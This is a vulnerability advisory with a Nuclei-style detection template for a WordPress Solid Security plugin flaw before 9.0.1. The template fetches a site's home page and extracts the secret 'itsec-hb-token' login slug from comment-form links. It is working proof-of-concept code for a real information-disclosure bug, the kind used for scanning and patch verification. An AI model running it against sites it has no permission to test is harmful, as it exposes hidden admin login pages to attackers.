WordPress Solid Security (formerly iThemes Security/Better WP Security) plugin before 9.0.1 is vulnerable to login page disclosure. When the Hide Backend feature is enabled and comments require user registration, the secret login URL token is exposed in the HTML source via the itsec-hb-token parameter in the comment form login links.
PoC代码[已公开]
id: wp-better-wp-security-login-disclosure
info:
name: WordPress Solid Security < 9.0.1 - Unauthenticated Login Page Disclosure
author: 0x_Akoko
severity: medium
description: |
WordPress Solid Security (formerly iThemes Security/Better WP Security) plugin before 9.0.1 is vulnerable to login page disclosure. When the Hide Backend feature is enabled and comments require user registration, the secret login URL token is exposed in the HTML source via the itsec-hb-token parameter in the comment form login links.
reference:
- https://wordpress.org/plugins/better-wp-security/
- https://wpscan.com/vulnerability/b7201fc1-d825-484f-aca9-ba14a968179b/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: wordpress,wp-plugin,wp,exposure,ithemes,solid-security
http:
- method: GET
path:
- "{{BaseURL}}/"
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "itsec-hb-token=")'
condition: and
extractors:
- type: regex
name: secret-login-slug
part: body
group: 1
regex:
- 'itsec-hb-token=([a-zA-Z0-9_-]+)'
# digest: 4a0a0047304502202c7c3c59545198c77c7a035c12926661b5c9e6d527e942d6107ecb7b6fef277c0221009d8fc72aa522bdd2f4c581728ee933e01c1b93d3bd41aa6bfe288639f4878105:922c64590222798bb761d5b6d8e72950